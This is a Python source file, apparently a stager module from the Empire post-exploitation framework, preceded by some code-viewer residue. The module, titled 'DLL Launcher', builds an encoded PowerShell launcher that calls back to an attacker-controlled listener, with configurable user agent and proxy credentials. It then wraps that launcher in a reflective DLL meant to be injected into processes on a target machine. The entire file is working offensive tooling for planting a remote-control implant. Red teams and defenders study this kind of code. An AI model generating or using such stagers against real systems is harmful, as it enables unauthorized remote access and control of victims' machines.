99 lines
3.5 KiB
Python
99 lines
3.5 KiB
Python
from lib.common import helpers
|
|
|
|
class Stager:
|
|
|
|
def __init__(self, mainMenu, params=[]):
|
|
|
|
self.info = {
|
|
'Name': 'DLL Launcher',
|
|
|
|
'Author': ['@sixdub'],
|
|
|
|
'Description': ('Generate a PowerPick Reflective DLL to inject with stager code.'),
|
|
|
|
'Comments': [
|
|
''
|
|
]
|
|
}
|
|
|
|
# any options needed by the stager, settable during runtime
|
|
self.options = {
|
|
# format:
|
|
# value_name : {description, required, default_value}
|
|
'Listener' : {
|
|
'Description' : 'Listener to generate stager for.',
|
|
'Required' : True,
|
|
'Value' : ''
|
|
},
|
|
'Arch' : {
|
|
'Description' : 'Architecture of the .dll to generate (x64 or x86).',
|
|
'Required' : True,
|
|
'Value' : 'x64'
|
|
},
|
|
'Listener' : {
|
|
'Description' : 'Listener to use.',
|
|
'Required' : True,
|
|
'Value' : ''
|
|
},
|
|
'UserAgent' : {
|
|
'Description' : 'User-agent string to use for the staging request (default, none, or other).',
|
|
'Required' : False,
|
|
'Value' : 'default'
|
|
},
|
|
'Proxy' : {
|
|
'Description' : 'Proxy to use for request (default, none, or other).',
|
|
'Required' : False,
|
|
'Value' : 'default'
|
|
},
|
|
'ProxyCreds' : {
|
|
'Description' : 'Proxy credentials ([domain\]username:password) to use for request (default, none, or other).',
|
|
'Required' : False,
|
|
'Value' : 'default'
|
|
},
|
|
'OutFile' : {
|
|
'Description' : 'File to output dll to.',
|
|
'Required' : True,
|
|
'Value' : '/tmp/launcher.dll'
|
|
}
|
|
}
|
|
|
|
# save off a copy of the mainMenu object to access external functionality
|
|
# like listeners/agent handlers/etc.
|
|
self.mainMenu = mainMenu
|
|
|
|
for param in params:
|
|
# parameter format is [Name, Value]
|
|
option, value = param
|
|
if option in self.options:
|
|
self.options[option]['Value'] = value
|
|
|
|
|
|
def generate(self):
|
|
|
|
listenerName = self.options['Listener']['Value']
|
|
arch = self.options['Arch']['Value']
|
|
|
|
# staging options
|
|
userAgent = self.options['UserAgent']['Value']
|
|
proxy = self.options['Proxy']['Value']
|
|
proxyCreds = self.options['ProxyCreds']['Value']
|
|
|
|
|
|
if not self.mainMenu.listeners.is_listener_valid(listenerName):
|
|
# not a valid listener, return nothing for the script
|
|
print helpers.color("[!] Invalid listener: " + listenerName)
|
|
return ""
|
|
else:
|
|
# generate the PowerShell one-liner with all of the proper options set
|
|
launcher = self.mainMenu.stagers.generate_launcher(listenerName, encode=True, userAgent=userAgent, proxy=proxy, proxyCreds=proxyCreds)
|
|
|
|
if launcher == "":
|
|
print helpers.color("[!] Error in launcher generation.")
|
|
return ""
|
|
else:
|
|
launcherCode = launcher.split(" ")[-1]
|
|
|
|
dll = self.mainMenu.stagers.generate_dll(launcherCode, arch)
|
|
|
|
return dll
|